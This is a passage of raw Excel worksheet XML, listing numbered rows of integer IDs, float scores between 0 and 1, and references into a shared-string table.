      <c r="A5736" s="1">
        <v>5734</v>
      </c>
      <c r="B5736">
        <v>1030</v>
      </c>
      <c r="C5736">
        <v>1030</v>
      </c>
      <c r="D5736">
        <v>3</v>
      </c>
      <c r="E5736">
        <v>0.55260002613067627</v>
      </c>
      <c r="F5736" t="s">
        <v>10120</v>
      </c>
      <c r="G5736" t="s">
        <v>11348</v>
      </c>
      <c r="H5736" t="s">
        <v>11349</v>
      </c>
    </row>
    <row r="5737" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5737" s="1">
        <v>5735</v>
      </c>
      <c r="B5737">
        <v>2954</v>
      </c>
      <c r="C5737">
        <v>2954</v>
      </c>
      <c r="D5737">
        <v>3</v>
      </c>
      <c r="E5737">
        <v>0.85460001230239868</v>
      </c>
      <c r="F5737" t="s">
        <v>10120</v>
      </c>
      <c r="G5737" t="s">
        <v>11350</v>
      </c>
      <c r="H5737" t="s">
        <v>11351</v>
      </c>
    </row>
    <row r="5738" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5738" s="1">
        <v>5736</v>
      </c>
      <c r="B5738">
        <v>1024</v>
      </c>
      <c r="C5738">
        <v>1024</v>
      </c>
      <c r="D5738">
        <v>3</v>
      </c>
      <c r="E5738">
        <v>0.77130001783370972</v>
      </c>
      <c r="F5738" t="s">
        <v>10120</v>
      </c>
      <c r="G5738" t="s">
        <v>11352</v>
      </c>
      <c r="H5738" t="s">
        <v>11353</v>
      </c>
    </row>
    <row r="5739" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5739" s="1">
        <v>5737</v>
      </c>
      <c r="B5739">
        <v>1020</v>
      </c>
      <c r="C5739">
        <v>1020</v>
      </c>
      <c r="D5739">
        <v>3</v>
      </c>
      <c r="E5739">
        <v>0.85659998655319214</v>
      </c>
      <c r="F5739" t="s">
        <v>10120</v>
      </c>
      <c r="G5739" t="s">
        <v>11354</v>
      </c>
      <c r="H5739" t="s">
        <v>11355</v>
      </c>
    </row>
    <row r="5740" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5740" s="1">
        <v>5738</v>
      </c>
      <c r="B5740">
        <v>1014</v>
      </c>
      <c r="C5740">
        <v>1014</v>
      </c>
      <c r="D5740">
        <v>3</v>
      </c>
      <c r="E5740">
        <v>0.33129999041557312</v>
      </c>
      <c r="F5740" t="s">
        <v>10120</v>
      </c>
      <c r="G5740" t="s">
        <v>11356</v>
      </c>
      <c r="H5740" t="s">
        <v>11357</v>
      </c>
    </row>
    <row r="5741" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5741" s="1">
        <v>5739</v>
      </c>
      <c r="B5741">
        <v>1011</v>
      </c>
      <c r="C5741">
        <v>1011</v>
      </c>
      <c r="D5741">
        <v>3</v>
      </c>
      <c r="E5741">
        <v>0.73919999599456787</v>
      </c>
      <c r="F5741" t="s">
        <v>10120</v>
      </c>
      <c r="G5741" t="s">
        <v>11358</v>
      </c>
      <c r="H5741" t="s">
        <v>11359</v>
      </c>
    </row>
    <row r="5742" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5742" s="1">
        <v>5740</v>
      </c>
      <c r="B5742">
        <v>2955</v>
      </c>
      <c r="C5742">
        <v>2955</v>
      </c>
      <c r="D5742">
        <v>3</v>
      </c>
      <c r="E5742">
        <v>0.87150001525878906</v>
      </c>
      <c r="F5742" t="s">
        <v>10120</v>
      </c>
      <c r="G5742" t="s">
        <v>11360</v>
      </c>
      <c r="H5742" t="s">
        <v>11361</v>
      </c>
    </row>
    <row r="5743" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5743" s="1">
        <v>5741</v>
      </c>
      <c r="B5743">
        <v>1009</v>
      </c>
      <c r="C5743">
        <v>1009</v>
      </c>
      <c r="D5743">
        <v>3</v>
      </c>
      <c r="E5743">
        <v>0.54119998216629028</v>
      </c>
      <c r="F5743" t="s">
        <v>10120</v>
      </c>
      <c r="G5743" t="s">
        <v>11362</v>
      </c>
      <c r="H5743" t="s">
        <v>11363</v>
      </c>
    </row>
    <row r="5744" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5744" s="1">
        <v>5742</v>
      </c>
      <c r="B5744">
        <v>2957</v>
      </c>
      <c r="C5744">
        <v>2957</v>
      </c>
      <c r="D5744">
        <v>3</v>
      </c>
      <c r="E5744">
        <v>0.60000002384185791</v>
      </c>
      <c r="F5744" t="s">
        <v>10120</v>
      </c>
      <c r="G5744" t="s">
        <v>11364</v>
      </c>
      <c r="H5744" t="s">
        <v>11365</v>
      </c>
    </row>
    <row r="5745" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5745" s="1">
        <v>5743</v>
      </c>
      <c r="B5745">
        <v>1025</v>
      </c>
      <c r="C5745">
        <v>1025</v>
      </c>
      <c r="D5745">
        <v>3</v>
      </c>
      <c r="E5745">
        <v>0.49880000948905939</v>
      </c>
      <c r="F5745" t="s">
        <v>10120</v>
      </c>
      <c r="G5745" t="s">
        <v>11366</v>
      </c>
      <c r="H5745" t="s">
        <v>11367</v>
      </c>
    </row>
    <row r="5746" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5746" s="1">
        <v>5744</v>
      </c>
      <c r="B5746">
        <v>2782</v>
      </c>
      <c r="C5746">
        <v>2782</v>
      </c>
      <c r="D5746">
        <v>3</v>
      </c>
      <c r="E5746">
        <v>0.86140000820159912</v>
      </c>
      <c r="F5746" t="s">
        <v>10120</v>
      </c>
      <c r="G5746" t="s">
        <v>11368</v>
      </c>
      <c r="H5746" t="s">
        <v>11369</v>
      </c>
    </row>
    <row r="5747" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5747" s="1">
        <v>5745</v>
      </c>
      <c r="B5747">
        <v>843</v>
      </c>
      <c r="C5747">
        <v>843</v>
      </c>
      <c r="D5747">
        <v>3</v>
      </c>
      <c r="E5747">
        <v>0.41260001063346857</v>
      </c>
      <c r="F5747" t="s">
        <v>10120</v>
      </c>
      <c r="G5747" t="s">
        <v>11370</v>
      </c>
      <c r="H5747" t="s">
        <v>11371</v>
      </c>
    </row>
    <row r="5748" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5748" s="1">
        <v>5746</v>
      </c>
      <c r="B5748">
        <v>840</v>
      </c>
      <c r="C5748">
        <v>840</v>
      </c>
      <c r="D5748">
        <v>3</v>
      </c>
      <c r="E5748">
        <v>0.63309997320175171</v>
      </c>
      <c r="F5748" t="s">
        <v>10120</v>
      </c>
      <c r="G5748" t="s">
        <v>11372</v>
      </c>
      <c r="H5748" t="s">
        <v>11373</v>
      </c>
    </row>
    <row r="5749" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5749" s="1">
        <v>5747</v>
      </c>
      <c r="B5749">
        <v>707</v>
      </c>
      <c r="C5749">
        <v>707</v>
      </c>
      <c r="D5749">
        <v>3</v>
      </c>
      <c r="E5749">
        <v>0.93049997091293335</v>
      </c>
      <c r="F5749" t="s">
        <v>10120</v>
      </c>
      <c r="G5749" t="s">
        <v>11374</v>
      </c>
      <c r="H5749" t="s">
        <v>11375</v>
      </c>
    </row>
    <row r="5750" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5750" s="1">
        <v>5748</v>
      </c>
      <c r="B5750">
        <v>3769</v>
      </c>
      <c r="C5750">
        <v>3769</v>
      </c>
      <c r="D5750">
        <v>3</v>
      </c>
      <c r="E5750">
        <v>0.82609999179840088</v>
      </c>
      <c r="F5750" t="s">
        <v>10120</v>
      </c>
      <c r="G5750" t="s">
        <v>11376</v>
      </c>
      <c r="H5750" t="s">
        <v>11377</v>
      </c>
    </row>
    <row r="5751" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5751" s="1">
        <v>5749</v>
      </c>
      <c r="B5751">
        <v>3770</v>
      </c>
      <c r="C5751">
        <v>3770</v>
      </c>
      <c r="D5751">
        <v>3</v>
      </c>
      <c r="E5751">
        <v>0.64630001783370972</v>
      </c>
      <c r="F5751" t="s">
        <v>10120</v>
      </c>
      <c r="G5751" t="s">
        <v>11378</v>
      </c>
      <c r="H5751" t="s">
        <v>11379</v>
      </c>
    </row>
    <row r="5752" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5752" s="1">
        <v>5750</v>
      </c>
      <c r="B5752">
        <v>706</v>
      </c>
      <c r="C5752">
        <v>706</v>
      </c>
      <c r="D5752">
        <v>3</v>
      </c>
      <c r="E5752">
        <v>0.99320000410079956</v>
      </c>
      <c r="F5752" t="s">
        <v>10120</v>
      </c>
      <c r="G5752" t="s">
        <v>11380</v>
      </c>
      <c r="H5752" t="s">
        <v>11381</v>
      </c>
    </row>
    <row r="5753" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5753" s="1">
        <v>5751</v>
      </c>
      <c r="B5753">
        <v>703</v>
      </c>
      <c r="C5753">
        <v>703</v>
      </c>
      <c r="D5753">
        <v>3</v>
      </c>
      <c r="E5753">
        <v>0.69340002536773682</v>
      </c>
      <c r="F5753" t="s">
        <v>10120</v>
      </c>
      <c r="G5753" t="s">
        <v>11382</v>
      </c>
      <c r="H5753" t="s">
        <v>11383</v>
      </c>
    </row>
    <row r="5754" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5754" s="1">
        <v>5752</v>
      </c>
      <c r="B5754">
        <v>3785</v>
      </c>
      <c r="C5754">
        <v>3785</v>
      </c>
      <c r="D5754">
        <v>3</v>
      </c>
      <c r="E5754">
        <v>0.56150001287460327</v>
      </c>
      <c r="F5754" t="s">
        <v>10120</v>
      </c>
      <c r="G5754" t="s">
        <v>11384</v>
      </c>
      <c r="H5754" t="s">
        <v>11385</v>
      </c>
    </row>
    <row r="5755" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5755" s="1">
        <v>5753</v>
      </c>
      <c r="B5755">
        <v>3786</v>
      </c>
      <c r="C5755">
        <v>3786</v>
      </c>
      <c r="D5755">
        <v>3</v>
      </c>
      <c r="E5755">
        <v>0.62900000810623169</v>
      </c>
      <c r="F5755" t="s">
        <v>10120</v>
      </c>
      <c r="G5755" t="s">
        <v>11386</v>
      </c>
      <c r="H5755" t="s">
        <v>11387</v>
      </c>
    </row>
    <row r="5756" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5756" s="1">
        <v>5754</v>
      </c>
      <c r="B5756">
        <v>702</v>
      </c>
      <c r="C5756">
        <v>702</v>
      </c>
      <c r="D5756">
        <v>3</v>
      </c>
      <c r="E5756">
        <v>0.99519997835159302</v>
      </c>
      <c r="F5756" t="s">
        <v>10120</v>
      </c>
      <c r="G5756" t="s">
        <v>11388</v>
      </c>
      <c r="H5756" t="s">
        <v>11389</v>
      </c>
    </row>
    <row r="5757" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5757" s="1">
        <v>5755</v>
      </c>
      <c r="B5757">
        <v>700</v>
      </c>
      <c r="C5757">
        <v>700</v>
      </c>
      <c r="D5757">
        <v>3</v>
      </c>
      <c r="E5757">
        <v>0.99839997291564941</v>
      </c>
      <c r="F5757" t="s">
        <v>10120</v>
      </c>
      <c r="G5757" t="s">
        <v>11390</v>
      </c>
      <c r="H5757" t="s">
        <v>11391</v>
      </c>
    </row>
    <row r="5758" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5758" s="1">
        <v>5756</v>
      </c>
      <c r="B5758">
        <v>3799</v>
      </c>
      <c r="C5758">
        <v>3799</v>
      </c>
      <c r="D5758">
        <v>3</v>
      </c>
      <c r="E5758">
        <v>0.61309999227523804</v>
      </c>
      <c r="F5758" t="s">
        <v>10120</v>
      </c>
      <c r="G5758" t="s">
        <v>11392</v>
      </c>
      <c r="H5758" t="s">
        <v>11393</v>
      </c>
    </row>
    <row r="5759" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5759" s="1">
        <v>5757</v>
      </c>
      <c r="B5759">
        <v>699</v>
      </c>
      <c r="C5759">
        <v>699</v>
      </c>
      <c r="D5759">
        <v>3</v>
      </c>
      <c r="E5759">
        <v>0.59460002183914185</v>
      </c>
      <c r="F5759" t="s">
        <v>10120</v>
      </c>
      <c r="G5759" t="s">
        <v>11394</v>
      </c>
      <c r="H5759" t="s">
        <v>11395</v>
      </c>
    </row>
    <row r="5760" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5760" s="1">
        <v>5758</v>
      </c>
      <c r="B5760">
        <v>698</v>
      </c>
      <c r="C5760">
        <v>698</v>
      </c>
      <c r="D5760">
        <v>3</v>
      </c>
      <c r="E5760">
        <v>0.9659000039100647</v>
      </c>
      <c r="F5760" t="s">
        <v>10120</v>
      </c>
      <c r="G5760" t="s">
        <v>11396</v>
      </c>
      <c r="H5760" t="s">
        <v>11397</v>
      </c>
    </row>
    <row r="5761" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5761" s="1">
        <v>5759</v>
      </c>
      <c r="B5761">
        <v>3811</v>
      </c>
      <c r="C5761">
        <v>3811</v>
      </c>
      <c r="D5761">
        <v>3</v>
      </c>
      <c r="E5761">
        <v>0.98600000143051147</v>
      </c>
      <c r="F5761" t="s">
        <v>10120</v>
      </c>
      <c r="G5761" t="s">
        <v>11398</v>
      </c>
      <c r="H5761" t="s">
        <v>11399</v>
      </c>
    </row>
    <row r="5762" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5762" s="1">
        <v>5760</v>
      </c>
      <c r="B5762">
        <v>3812</v>
      </c>
      <c r="C5762">
        <v>3812</v>
      </c>
      <c r="D5762">
        <v>3</v>
      </c>
      <c r="E5762">
        <v>0.94139999151229858</v>
      </c>
      <c r="F5762" t="s">
        <v>10120</v>
      </c>
      <c r="G5762" t="s">
        <v>11400</v>
      </c>
      <c r="H5762" t="s">
        <v>11401</v>
      </c>
    </row>
    <row r="5763" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5763" s="1">
        <v>5761</v>
      </c>
      <c r="B5763">
        <v>3816</v>
      </c>
      <c r="C5763">
        <v>3816</v>
      </c>
      <c r="D5763">
        <v>3</v>
      </c>
      <c r="E5763">
        <v>0.94840002059936523</v>
      </c>
      <c r="F5763" t="s">
        <v>10120</v>
      </c>
      <c r="G5763" t="s">
        <v>11402</v>
      </c>
      <c r="H5763" t="s">
        <v>11403</v>
      </c>
    </row>
    <row r="5764" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5764" s="1">
        <v>5762</v>
      </c>
      <c r="B5764">
        <v>697</v>
      </c>
      <c r="C5764">
        <v>697</v>
      </c>
      <c r="D5764">
        <v>3</v>
      </c>
      <c r="E5764">
        <v>0.78219997882843018</v>
      </c>
      <c r="F5764" t="s">
        <v>10120</v>
      </c>
      <c r="G5764" t="s">
        <v>11404</v>
      </c>
      <c r="H5764" t="s">
        <v>11405</v>
      </c>
    </row>
    <row r="5765" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5765" s="1">
        <v>5763</v>
      </c>
      <c r="B5765">
        <v>3823</v>
      </c>
      <c r="C5765">
        <v>3823</v>
      </c>
      <c r="D5765">
        <v>3</v>
      </c>
      <c r="E5765">
        <v>0.99830001592636108</v>
      </c>
      <c r="F5765" t="s">
        <v>10120</v>
      </c>
      <c r="G5765" t="s">
        <v>11406</v>
      </c>
      <c r="H5765" t="s">
        <v>11407</v>
      </c>
    </row>
    <row r="5766" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5766" s="1">
        <v>5764</v>
      </c>
      <c r="B5766">
        <v>3768</v>
      </c>
      <c r="C5766">
        <v>3768</v>
      </c>
      <c r="D5766">
        <v>3</v>
      </c>
      <c r="E5766">
        <v>0.8815000057220459</v>
      </c>
      <c r="F5766" t="s">
        <v>10120</v>
      </c>
      <c r="G5766" t="s">
        <v>11408</v>
      </c>
      <c r="H5766" t="s">
        <v>11409</v>
      </c>
    </row>
    <row r="5767" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5767" s="1">
        <v>5765</v>
      </c>
      <c r="B5767">
        <v>3827</v>
      </c>
      <c r="C5767">
        <v>3827</v>
      </c>
      <c r="D5767">
        <v>3</v>
      </c>
      <c r="E5767">
        <v>0.65570002794265747</v>
      </c>
      <c r="F5767" t="s">
        <v>10120</v>
      </c>
      <c r="G5767" t="s">
        <v>11410</v>
      </c>
      <c r="H5767" t="s">
        <v>11411</v>
      </c>
    </row>
    <row r="5768" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5768" s="1">
        <v>5766</v>
      </c>
      <c r="B5768">
        <v>3767</v>
      </c>
      <c r="C5768">
        <v>3767</v>
      </c>
      <c r="D5768">
        <v>3</v>
      </c>
      <c r="E5768">
        <v>0.93919998407363892</v>
      </c>
      <c r="F5768" t="s">
        <v>10120</v>
      </c>
      <c r="G5768" t="s">
        <v>11412</v>
      </c>
      <c r="H5768" t="s">
        <v>11413</v>
      </c>
    </row>
    <row r="5769" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5769" s="1">
        <v>5767</v>
      </c>
      <c r="B5769">
        <v>3764</v>
      </c>
      <c r="C5769">
        <v>3764</v>
      </c>
      <c r="D5769">
        <v>3</v>
      </c>
      <c r="E5769">
        <v>0.5317000150680542</v>
      </c>
      <c r="F5769" t="s">
        <v>10120</v>
      </c>
      <c r="G5769" t="s">
        <v>11414</v>
      </c>
      <c r="H5769" t="s">
        <v>11415</v>
      </c>
    </row>
    <row r="5770" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5770" s="1">
        <v>5768</v>
      </c>
      <c r="B5770">
        <v>727</v>
      </c>
      <c r="C5770">
        <v>727</v>
      </c>
      <c r="D5770">
        <v>3</v>
      </c>
      <c r="E5770">
        <v>0.46079999208450317</v>
      </c>
      <c r="F5770" t="s">
        <v>10120</v>
      </c>
      <c r="G5770" t="s">
        <v>11416</v>
      </c>
      <c r="H5770" t="s">
        <v>11417</v>
      </c>
    </row>
    <row r="5771" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5771" s="1">
        <v>5769</v>
      </c>
      <c r="B5771">
        <v>720</v>
      </c>
      <c r="C5771">
        <v>720</v>
      </c>
      <c r="D5771">
        <v>3</v>
      </c>
      <c r="E5771">
        <v>0.84109997749328613</v>
      </c>
      <c r="F5771" t="s">
        <v>10120</v>
      </c>
      <c r="G5771" t="s">
        <v>11418</v>
      </c>
      <c r="H5771" t="s">
        <v>11419</v>
      </c>
    </row>
    <row r="5772" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5772" s="1">
        <v>5770</v>
      </c>
      <c r="B5772">
        <v>3736</v>
      </c>
      <c r="C5772">
        <v>3736</v>
      </c>
      <c r="D5772">
        <v>3</v>
      </c>
      <c r="E5772">
        <v>0.64490002393722534</v>
      </c>
      <c r="F5772" t="s">
        <v>10120</v>
      </c>
      <c r="G5772" t="s">
        <v>11420</v>
      </c>
      <c r="H5772" t="s">
        <v>11421</v>
      </c>
    </row>
    <row r="5773" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5773" s="1">
        <v>5771</v>
      </c>
      <c r="B5773">
        <v>3740</v>
      </c>
      <c r="C5773">
        <v>3740</v>
      </c>
      <c r="D5773">
        <v>3</v>
      </c>
      <c r="E5773">
        <v>0.54290002584457397</v>
      </c>
      <c r="F5773" t="s">
        <v>10120</v>
      </c>
      <c r="G5773" t="s">
        <v>11422</v>
      </c>
      <c r="H5773" t="s">
        <v>11423</v>
      </c>
    </row>
    <row r="5774" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5774" s="1">
        <v>5772</v>
      </c>
      <c r="B5774">
        <v>3743</v>
      </c>
      <c r="C5774">
        <v>3743</v>
      </c>
      <c r="D5774">
        <v>3</v>
      </c>
      <c r="E5774">
        <v>0.99269998073577881</v>
      </c>
      <c r="F5774" t="s">
        <v>10120</v>
      </c>
      <c r="G5774" t="s">
        <v>11424</v>
      </c>
      <c r="H5774" t="s">
        <v>11425</v>
      </c>
    </row>
    <row r="5775" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5775" s="1">
        <v>5773</v>
      </c>
      <c r="B5775">
        <v>3749</v>
      </c>
      <c r="C5775">
        <v>3749</v>
      </c>
      <c r="D5775">
        <v>3</v>
      </c>
      <c r="E5775">
        <v>0.65369999408721924</v>
      </c>
      <c r="F5775" t="s">
        <v>10120</v>
      </c>
      <c r="G5775" t="s">
        <v>11426</v>
      </c>
      <c r="H5775" t="s">
        <v>11427</v>
      </c>
    </row>
    <row r="5776" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5776" s="1">
        <v>5774</v>
      </c>
      <c r="B5776">
        <v>713</v>
      </c>
      <c r="C5776">
        <v>713</v>
      </c>
      <c r="D5776">
        <v>3</v>
      </c>
      <c r="E5776">
        <v>0.78179997205734253</v>
      </c>
      <c r="F5776" t="s">
        <v>10120</v>
      </c>
      <c r="G5776" t="s">
        <v>11428</v>
      </c>
      <c r="H5776" t="s">
        <v>11429</v>
      </c>
    </row>
    <row r="5777" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5777" s="1">
        <v>5775</v>
      </c>
      <c r="B5777">
        <v>3751</v>
      </c>
      <c r="C5777">
        <v>3751</v>
      </c>
      <c r="D5777">
        <v>3</v>
      </c>
      <c r="E5777">
        <v>0.75080001354217529</v>
      </c>
      <c r="F5777" t="s">
        <v>10120</v>
      </c>
      <c r="G5777" t="s">
        <v>11430</v>
      </c>
      <c r="H5777" t="s">
        <v>11431</v>
      </c>
    </row>
    <row r="5778" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5778" s="1">
        <v>5776</v>
      </c>
      <c r="B5778">
        <v>3752</v>
      </c>
      <c r="C5778">
        <v>3752</v>
      </c>
      <c r="D5778">
        <v>3</v>
      </c>
      <c r="E5778">
        <v>0.66960000991821289</v>
      </c>
      <c r="F5778" t="s">
        <v>10120</v>
      </c>
      <c r="G5778" t="s">
        <v>11432</v>
      </c>
      <c r="H5778" t="s">
        <v>11433</v>
      </c>
    </row>
    <row r="5779" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5779" s="1">
        <v>5777</v>
      </c>
      <c r="B5779">
        <v>3753</v>
      </c>
      <c r="C5779">
        <v>3753</v>
      </c>
      <c r="D5779">
        <v>3</v>
      </c>
      <c r="E5779">
        <v>0.71569997072219849</v>
      </c>
      <c r="F5779" t="s">
        <v>10120</v>
      </c>
      <c r="G5779" t="s">
        <v>11434</v>
      </c>
      <c r="H5779" t="s">
        <v>11435</v>
      </c>
    </row>
    <row r="5780" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5780" s="1">
        <v>5778</v>
      </c>
      <c r="B5780">
        <v>3754</v>
      </c>
      <c r="C5780">
        <v>3754</v>
      </c>
      <c r="D5780">
        <v>3</v>
      </c>
      <c r="E5780">
        <v>0.71569997072219849</v>
      </c>
      <c r="F5780" t="s">
        <v>10120</v>
      </c>
      <c r="G5780" t="s">
        <v>11436</v>
      </c>
      <c r="H5780" t="s">
        <v>11435</v>
      </c>
    </row>
    <row r="5781" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5781" s="1">
        <v>5779</v>
      </c>
      <c r="B5781">
        <v>3755</v>
      </c>
      <c r="C5781">
        <v>3755</v>
      </c>
      <c r="D5781">
        <v>3</v>
      </c>
      <c r="E5781">
        <v>0.74519997835159302</v>
      </c>
      <c r="F5781" t="s">
        <v>10120</v>
      </c>
      <c r="G5781" t="s">
        <v>11437</v>
      </c>
      <c r="H5781" t="s">
        <v>11438</v>
      </c>
    </row>
    <row r="5782" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5782" s="1">
        <v>5780</v>
      </c>
      <c r="B5782">
        <v>712</v>
      </c>
      <c r="C5782">
        <v>712</v>
      </c>
      <c r="D5782">
        <v>3</v>
      </c>
      <c r="E5782">
        <v>0.82499998807907104</v>
      </c>
      <c r="F5782" t="s">
        <v>10120</v>
      </c>
      <c r="G5782" t="s">
        <v>11439</v>
      </c>
      <c r="H5782" t="s">
        <v>11440</v>
      </c>
    </row>
    <row r="5783" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5783" s="1">
        <v>5781</v>
      </c>
      <c r="B5783">
        <v>709</v>
      </c>
      <c r="C5783">
        <v>709</v>
      </c>
      <c r="D5783">
        <v>3</v>
      </c>
      <c r="E5783">
        <v>0.99730002880096436</v>
      </c>
      <c r="F5783" t="s">
        <v>10120</v>
      </c>
      <c r="G5783" t="s">
        <v>11441</v>
      </c>
      <c r="H5783" t="s">
        <v>11442</v>
      </c>
    </row>
    <row r="5784" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5784" s="1">
        <v>5782</v>
      </c>
      <c r="B5784">
        <v>3758</v>
      </c>
      <c r="C5784">
        <v>3758</v>
      </c>
      <c r="D5784">
        <v>3</v>
      </c>
      <c r="E5784">
        <v>0.72369998693466187</v>
      </c>
      <c r="F5784" t="s">
        <v>10120</v>
      </c>
      <c r="G5784" t="s">
        <v>11443</v>
      </c>
      <c r="H5784" t="s">
        <v>11444</v>
      </c>
    </row>
    <row r="5785" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5785" s="1">
        <v>5783</v>
      </c>
      <c r="B5785">
        <v>3762</v>
      </c>
      <c r="C5785">
        <v>3762</v>
      </c>
      <c r="D5785">
        <v>3</v>
      </c>
      <c r="E5785">
        <v>0.63139998912811279</v>
      </c>
      <c r="F5785" t="s">
        <v>10120</v>
      </c>
      <c r="G5785" t="s">
        <v>11445</v>
      </c>
      <c r="H5785" t="s">
        <v>11446</v>
      </c>
    </row>
    <row r="5786" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5786" s="1">
        <v>5784</v>
      </c>
      <c r="B5786">
        <v>3763</v>
      </c>
      <c r="C5786">
        <v>3763</v>
      </c>
      <c r="D5786">
        <v>3</v>
      </c>
      <c r="E5786">
        <v>0.76660001277923584</v>
      </c>
      <c r="F5786" t="s">
        <v>10120</v>
      </c>
      <c r="G5786" t="s">
        <v>11447</v>
      </c>
      <c r="H5786" t="s">
        <v>11448</v>
      </c>
    </row>
    <row r="5787" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5787" s="1">
        <v>5785</v>
      </c>
      <c r="B5787">
        <v>3765</v>
      </c>
      <c r="C5787">
        <v>3765</v>
      </c>
      <c r="D5787">
        <v>3</v>
      </c>
      <c r="E5787">
        <v>0.99400001764297485</v>
      </c>
      <c r="F5787" t="s">
        <v>10120</v>
      </c>
      <c r="G5787" t="s">
        <v>11449</v>
      </c>
      <c r="H5787" t="s">
        <v>11450</v>
      </c>
    </row>
    <row r="5788" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5788" s="1">
        <v>5786</v>
      </c>
      <c r="B5788">
        <v>728</v>
      </c>
      <c r="C5788">
        <v>728</v>
      </c>
      <c r="D5788">
        <v>3</v>
      </c>
      <c r="E5788">
        <v>0.82499998807907104</v>
      </c>
      <c r="F5788" t="s">
        <v>10120</v>
      </c>
      <c r="G5788" t="s">
        <v>11451</v>
      </c>
      <c r="H5788" t="s">
        <v>11452</v>
      </c>
    </row>
    <row r="5789" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5789" s="1">
        <v>5787</v>
      </c>
      <c r="B5789">
        <v>3829</v>
      </c>
      <c r="C5789">
        <v>3829</v>
      </c>
      <c r="D5789">
        <v>3</v>
      </c>
      <c r="E5789">
        <v>0.66200000047683716</v>
      </c>
      <c r="F5789" t="s">
        <v>10120</v>
      </c>
      <c r="G5789" t="s">
        <v>11453</v>
      </c>
      <c r="H5789" t="s">
        <v>11454</v>
      </c>
    </row>
    <row r="5790" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5790" s="1">
        <v>5788</v>
      </c>
      <c r="B5790">
        <v>3834</v>
      </c>
      <c r="C5790">
        <v>3834</v>
      </c>
      <c r="D5790">
        <v>3</v>
      </c>
      <c r="E5790">
        <v>0.74980002641677856</v>
      </c>
      <c r="F5790" t="s">
        <v>10120</v>
      </c>
      <c r="G5790" t="s">
        <v>11455</v>
      </c>
      <c r="H5790" t="s">
        <v>11456</v>
      </c>
    </row>
    <row r="5791" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5791" s="1">
        <v>5789</v>
      </c>
      <c r="B5791">
        <v>3904</v>
      </c>
      <c r="C5791">
        <v>3904</v>
      </c>
      <c r="D5791">
        <v>3</v>
      </c>
      <c r="E5791">
        <v>0.70190000534057617</v>
      </c>
      <c r="F5791" t="s">
        <v>10120</v>
      </c>
      <c r="G5791" t="s">
        <v>11457</v>
      </c>
      <c r="H5791" t="s">
        <v>11458</v>
      </c>
    </row>
    <row r="5792" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5792" s="1">
        <v>5790</v>
      </c>
      <c r="B5792">
        <v>690</v>
      </c>
      <c r="C5792">
        <v>690</v>
      </c>
      <c r="D5792">
        <v>3</v>
      </c>
      <c r="E5792">
        <v>0.88270002603530884</v>
      </c>
      <c r="F5792" t="s">
        <v>10120</v>
      </c>
      <c r="G5792" t="s">
        <v>11459</v>
      </c>
      <c r="H5792" t="s">
        <v>11460</v>
      </c>
    </row>
    <row r="5793" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5793" s="1">
        <v>5791</v>
      </c>
      <c r="B5793">
        <v>689</v>
      </c>
      <c r="C5793">
        <v>689</v>
      </c>
      <c r="D5793">
        <v>3</v>
      </c>
      <c r="E5793">
        <v>0.98809999227523804</v>
      </c>
      <c r="F5793" t="s">
        <v>10120</v>
      </c>
      <c r="G5793" t="s">
        <v>11461</v>
      </c>
      <c r="H5793" t="s">
        <v>11462</v>
      </c>
    </row>
    <row r="5794" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5794" s="1">
        <v>5792</v>
      </c>
      <c r="B5794">
        <v>3929</v>
      </c>
      <c r="C5794">
        <v>3929</v>
      </c>
      <c r="D5794">
        <v>3</v>
      </c>
      <c r="E5794">
        <v>0.7434999942779541</v>
